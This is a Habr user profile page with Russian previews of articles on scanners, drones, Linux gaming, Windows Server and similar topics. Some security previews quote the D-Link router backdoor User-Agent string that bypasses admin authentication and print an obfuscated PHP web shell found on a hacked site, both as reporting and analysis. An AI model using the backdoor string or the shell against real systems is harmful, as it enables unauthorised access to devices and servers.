Pull to refresh
11
0
Kovu Dragon @Kovu

Пользователь

Send message

Как научить сканеры сканировать молча по кнопкам без окон и костылей?

Reading time6 min
Views144K
Как заставить сканеры вообще (речь пойдет про Canoscan LIDE 210) молчаливо по кнопке сканировать файл с нужными параметрами в требуемую папку?

image


По-моему, это самая распространенная задача и для ее решения производитель нам дает самые нераспространенные решения.
В следующих версиях производители ну наверняка добавят в свой софт что-то вроде «отправить скан в facebook» или «поделиться в Twitter» но чтобы сделать тихий режим, настроить раз и сканировать без каких либо окон… до этого мы не доживем.

В конце статьи готовая утилита, позволяющая производить сканирование с любой кнопки любого сканера в любую папку без какого либо проявления на экране. А теперь начнем с того, каким же образом это удалось реализовать…
Сканировать
Total votes 45: ↑36 and ↓9+27
Comments45

Повышаем безопасность в два клика

Reading time4 min
Views47K



Эта статья не о том, как защитить свой компьютер, а о том, как снизить уровень уличной преступности. Ниже представлен проект, который, в случае реализации, повысит безопасность каждого из нас в отдельности и общества в целом. Кроме того, он способен изменить к лучшему и само общество.

Для реализации проекта не нужна ни техническая революция, ни вмешательство инопланетян. Достаточно, чтобы наше сообщество высказалось «ЗА».

Читать дальше →
Total votes 90: ↑72 and ↓18+54
Comments169

Обзор квадрокоптера DJI Phantom для использования с GoPro

Reading time2 min
Views92K


Привет, жители Хабра. Несколько дней назад я выкладывал обзор GoPro Hero 3 Black Edition и историю компании Woodman Lans. Как оказалось, многим эта статья и этот ролик пришлись по душе, поэтому я решил не останавливаться. Мы взяли на тест квадрокоптер для GoPro под названием DJI Phantom, обзор которого в русскоязычном рунете я, пожалуй, еще не встречал.
Читать дальше →
Total votes 42: ↑33 and ↓9+24
Comments55

Очередная программная закладка в роутерах D-Link

Reading time2 min
Views132K
image

На информационном портале devttys0.com некто Craig Heffner – опытный специалист в области реверс-инжиниринга – выложил статью-исследование очередной (уже находили) программной закладки в роутерах D-Link. На этот раз закладка была выявлена в официальной прошивке для DIR-100 revA, но, по его мнению, присутствует в роутерах других серий:

  • DIR-100
  • DI-524
  • DI-524UP
  • DI-604S
  • DI-604UP
  • DI-604+
  • TM-G5240
  • Planex BRL-04UR
  • Planex BRL-04CW

Коротко говоря, если у вашего браузера установлен User-Agent как «xmlset_roodkcableoj28840ybtide», то вы автоматически получаете админский доступ к веб-панели управления роутером без всякой авторизации.
Подробнее
Total votes 217: ↑213 and ↓4+209
Comments105

Дыра в безопасности IP-телефонов D-Link? Нет, это «Особенность»!

Reading time2 min
Views43K
Интуиция системных администраторов чаще всего подсказывает: «Держись от оборудования D-Link подальше». Если про качество сборки этих устройств и надежность их работы отдельно говорить не приходится: большинство админов, так или иначе знакомых с продукцией этого вендора не ждут здесь чудес, то вот такой пункт как «Безопасность» — уже не поддается органам чувств.

image

Однако, и тут нас компания D-Link успела «порадовать», реализовав "секьюити-фичу" и подтвердив её документально…

Если в вашей компании используется IP-телефония и есть оборудование D-Link, то этот материал настоятельно рекомендуется к прочтению.
Читать дальше →
Total votes 87: ↑82 and ↓5+77
Comments86

Гейб Ньюэлл: будущее игр — за Linux

Reading time2 min
Views98K
В прошлом году Гейб Ньюэлл, руководитель компании Valve сделал ставку на Linux как игровую платформу. Вскоре компания начала воплощать в жизнь новую стратегию: вышел Steam под Linux, а с ним все части Half-Life 2, Left 4 Dead 2, Portal и многие другие игры. Разработчики Valve объяснили, почему Linux с технической точки зрения — более предпочтительная платформа для игр, чем Windows 8.



Вчера Гейб Ньюэлл выступил на конференции LinuxCon, подвёл итоги года и прямо заявил: будущее игр — за Linux, несмотря на скромную долю этой ОС в настоящее время.
Читать дальше →
Total votes 161: ↑143 and ↓18+125
Comments393

Intel Anti-Theft ― отряд специального назначения

Reading time3 min
Views88K


Каждые 53 секунды в мире крадут ноутбук. В одних только американских аэропортах число похищенных ноутбуков доходит до 12 тыс. еженедельно. Около половины из них содержат конфиденциальные данные в незашифрованном виде. Такую занимательную статистику приводит компания Intel на официальном сайте.
В своей заметке я расскажу о том, какие шаги сделала Intel в сторону изменения этой печальной статистики.
Читать дальше →
Total votes 41: ↑37 and ↓4+33
Comments53

PHP-шелл без единого буквенно-цифрового символа

Reading time1 min
Views89K
Вчера в блоге компании Sucuri появился любопытный вопрос: некий владелец сайта, обнаружив его взломанным, был немало удивлён, обнаружив следующий злонамеренный код; что именно он делает?
@$_[]=@!+_; $__=@${_}>>$_;$_[]=$__;$_[]=@_;$_[((++$__)+($__++ ))].=$_;
$_[]=++$__; $_[]=$_[--$__][$__>>$__];$_[$__].=(($__+$__)+ $_[$__-$__]).($__+$__+$__)+$_[$__-$__];
$_[$__+$__] =($_[$__][$__>>$__]).($_[$__][$__]^$_[$__][($__<<$__)-$__] );
$_[$__+$__] .=($_[$__][($__<<$__)-($__/$__)])^($_[$__][$__] );
$_[$__+$__] .=($_[$__][$__+$__])^$_[$__][($__<<$__)-$__ ];
$_=$ 
$_[$__+ $__] ;$_[@-_]($_[@!+_] );

Как видно, в коде нет ни вызовов функций, ни вообще какого-либо буквенно-цифрового символа.
Узнать подробности
Total votes 119: ↑105 and ↓14+91
Comments33

Упрощаем жизнь администратору, ассоциируем имя пользователя и имя компьютера в автоматическом режиме в каталоге AD

Reading time10 min
Views150K
Добрый день, хабр!
Наверное, у всех системных администраторов была проблема определения имени компьютера пользователя. То есть мы знаем имя сотрудника, но какой у него компьютер, без понятия. И, зачастую, попытка заставить пользователя определить имя компьютера вызывает мучение. Они вместо этого называют имя пользователя, mail, номер телефона, все что угодно, только не имя компьютера. А попытка объяснить пользователю где находится информация о системе вызывает баттхерт сотрудника и лютую ненависть. Можно, конечно, было бы написать какую-нибудь утилитку, позволяющая отображать имя компьютера на рабочем столе или где-нибудь еще на видном месте, но для этого надо каждый раз объяснять где находится эта информация. Немного упрощает задачу, но не решает ее полностью. Тем более что я склоняюсь к тому, что пользователю и во все положено не знать имя компьютера, на котором он сидит. В результате было решено сделать определение имени компьютера современным, удобным, правильным и, главное, автоматическим.

image
Примерно так может выглядеть подключение к компьютеру. При чем оснастку даже не обязательно открывать с помощью административной учетной записи. Для тех, кому интересно как все это работает и как это сделать в вашей инфраструктуре, добро пожаловать под кат.
Для выполнения описанного, вы должны понимать что такое AD, понимать хотя бы примерно структуру объектов в AD, понимать работу скриптов, а также любить котиков.
Читать дальше →
Total votes 36: ↑28 and ↓8+20
Comments48

Amazon открыл доставку электроники в Россию

Reading time1 min
Views152K


In Soviet Russia:


Сегодня интернет-магазин Amazon начал доставку потребительской электроники в Россию. Соответствующие изменения были внесены в систему заказа товаров на сайте компании 2 сентября. Полный список стран, куда осуществляется доставка можно посмотреть тут.
Читать дальше →
Total votes 56: ↑49 and ↓7+42
Comments141

Хранилища и высокая доступность в Windows Server 2012 R2

Reading time8 min
Views45K
Всем привет, уважаемые коллеги и фанаты ИТ-технологий!

Сегодня мне хотелось бы рассказать вам про новинки которые у нас появятся в области управление дисковыми подсистемами и хранилищами данных в Windows Sever 2012 R2. Несмотря на то, что с выходом Windows Server 2012 улучшений, касающихся хранилищ данных и работы с дисковыми массивами и сетями SAN, было огромное множество, версия R2 также обладает внушительным списком нововведений, с одной стороны -так и эволюционными улучшениями функций, которые появились в выходом его предшественника.


И так, давайте попробуем разобраться, что же у нас появилось принципиально нового в Windows Server 2012 R2, а что же продолжает стремительно развиваться в новой инкарнации нашего замечательного серверного продукта.
Читать дальше →
Total votes 34: ↑23 and ↓11+12
Comments4

РосВыборы Опасносте

Reading time2 min
Views21K
Здравствуйте, господа инженеры.

В свободное от сна и работы за деньги время я управляю разработкой проекта РосВыборы — системы сбора и координации волонтёров, готовых быть наблюдателями на выборах 8 сентября. Задача РосВыборов — ввести в состав каждой избирательной комиссии максимально возможное количество своих наблюдателей и сопротивляться действиям недобросовестных членов избирательных комиссий — максимизировать время нахождения наблюдаталей на участках, обеспечить поддержку наблюдателей мобильными группами поддержки и контакт-центром. Цель — сделать результаты выборов максимально приближёнными к фактически отданным голосам избирателей, минимизировав влияние сил зла на официальные результаты.
Читать дальше →
Total votes 188: ↑144 and ↓44+100
Comments90

Cookie без куков

Reading time1 min
Views55K

Отслеживание



Как мы обычно отслеживаем посетителей сайта? Одним из следующих методов:

  • cookies
  • javascript
  • local storage
  • flash, java, иные плагины
  • ip-адрес и UserAgent


Допустим, пользователь отключил всё это (и ходит через прокси или даже vpn). Есть ли способ всё-таки его отследить?
Оказывается — да. Это кэш браузера.
Читать дальше →
Total votes 132: ↑110 and ↓22+88
Comments27

Как узнать, что ваш PHP сайт был взломан

Reading time11 min
Views134K
Сайт моего друга недавно был взломан, на нем была запущена старая версия IP.Board, в которой есть уязвимость локального внедрения кода (local file inclusion). Этот пост не будет посвящен IP.Board или другому php коду, он покажет, как найти потенциально вредоносный php код на ваших серверах. Наконец, покажу пример того, что злоумышленники могут загрузить на взломанный сайт.

Проверьте логи доступа


Что бы с чего-то начать, я бы хотел поделиться некоторыми записями из журнала доступа (access log) взломанного сайта моего друга.

IpreMOVED - - [01/Mar/2013:06:16:48 -0600] "POST /uploads/monthly_10_2012/view.php HTTP/1.1" 200 36 "-" "Mozilla/5.0"
IpreMOVED - - [01/Mar/2013:06:12:58 -0600] "POST /public/style_images/master/profile/blog.php HTTP/1.1" 200 36 "-" "Mozilla/5.0"

Необходимо часто проверять журналы доступа на сервере, однако если вы не будете осторожны, URL такие как выше, которые на первый взгляд выглядят безобидно, могут пройти прямо мимо вас.

Два файла выше это загруженные взломщиком скрипты, как они туда попали, большой роли не играет, так как код на любых двух серверах, вероятно, будет различным. Тем не менее, в данном конкретном примере, уязвимость в устаревшей версии IP.Board была использована, и атакующие смогли добавить свои собственные скрипты в директории доступные для записи, такие как пользовательский каталог загрузки и каталог, в котором IP.Board хранит кэшированные изображения темы оформления. Это общий вектор атаки, много людей изменяют права на эти каталоги на 777 или дают им доступ на запись, подробнее об этом чуть позже.

Рассмотрим подробнее приведенные выше строки журнала, ничего не цепляет вас?

Обратите внимание, что в журнале доступа POST запросы, а не GET запросы.
Скорее всего, злоумышленники хотели сделать журнал доступа более неприметным, так как большинство журналов не сохраняют post данные.
Читать дальше →
Total votes 109: ↑82 and ↓27+55
Comments122

CSS-маски для hover-эффекта

Reading time4 min
Views71K


На многих сайтах-портфолио работы представлены в виде небольших картинок-миниатюр с приятными hover-эффектами. В этой статье будет рассказано о способе сделать такой эффект, используя CSS-маски. Работает только в современных браузерах, но к счастью и в старых верстка выглядит корректно и не съезжает.
Читать дальше →
Total votes 58: ↑54 and ↓4+50
Comments11

750 миллионов мобильных телефонов уязвимы для злоумышленников из-за недостаточно защищенных SIM карт

Reading time2 min
Views39K


Карстен Нол (Karsten Nohl), основатель компании Security Research Labs, заявил об обнаружении уязвимости SIM-карт со стандартом шифрования DES (Data Encryption Standard). Это устаревший стандарт, который, впрочем, используется большим количеством производителей, и сотни миллионов SIM-карт поддерживают именно DES. Так вот, данная уязвимость позволяет при отсылке на телефон фейкового сообщения от оператора связи получить 56-битный ключ в ответном сообщении (ответ отсылается автоматически, и около 25% DES-карт подвержены такому «обману»).

Читать дальше →
Total votes 54: ↑46 and ↓8+38
Comments37

Руководство по созданию собственной установочной сборки Windows 8

Reading time16 min
Views54K
Введение

Сегодня я хочу рассказать о том, как создать собственный установочный образ Windows 8, со всеми установленными обновлениями, программами и пользовательскими настройками.

Использование такой сборки автоматизирует работу системного администратора по установке и настройки операционной системы. Особо актуально для тех случаев, когда необходимо установить однотипный набор программ на большое количество компьютеров. Так же полезно руководство будет и тем, кто просто хочет создать собственный установочный образ Windows 8 с набором используемых им программ и драйверов.

В данном руководстве затрагиваются вопросы подготовки такой сборки, создание загрузочной флешки и записи полученной сборки на флешку. Так же, полученный образ в дальнейшем, используя службы развертывания в сети (WDS), можно установить на любое количество компьютеров в корпоративной сети, но это тема уже следующего руководства.

Текст рассчитан на начинающих пользователей, поэтому объясняются и иллюстрируются порой простейшие вещи.

Читать далее...
Total votes 63: ↑45 and ↓18+27
Comments40

Суперзащищенные флешки и жесткие диски

Reading time3 min
Views59K
Всем привет!

На хабре уже был подобный обзор супер защищенной флешки datAshur, однако сегодня я бы хотел рассказать о всех моделях защищенных устройств этого производителя.

Заказываю такие устройства довольно часто, так что производитель предоставил промо-код специально для этого обзора (скидка 5% — LS18413).

image

Итак, в основе любого такого носителя информации — клавиатура для набора пинкода. Устройства представлены в различных форм-факторах: флешка (datAshur, 4-32 Gb) и жесткие диски (250-3000 Gb).
Читать дальше →
Total votes 62: ↑48 and ↓14+34
Comments72

Google и Time запустили сервис, показывающий, как изменилась планета за 30 лет

Reading time1 min
Views133K
image

Благодаря новому проекту Google и журнала Time появилась возможность увидеть, как изменялась поверхность Земли последние 30 лет. В сотрудничестве с Геологической службой США (USGS) и НАСА они собрали вместе изображения планеты, сделанные из космоса за более четверть века, и составили из них интерактивную покадровую карту.

Эту карту, которая, как пишут в блоге Google, состоит из миллионов спутниковых снимков и триллионов пикселей, можно посмотреть на сайте Timelapse. Кроме истории расширения родного города, можете увидеть, как строились искусственные Пальмовые острова в Дубае, как отступает ледник Колумбия на Аляске, как вырубались леса Амазонки и как рос Лас-Вегас с 1984 по 2012 год.
Читать дальше →
Total votes 150: ↑143 and ↓7+136
Comments70

Information

Rating
Does not participate
Registered
Activity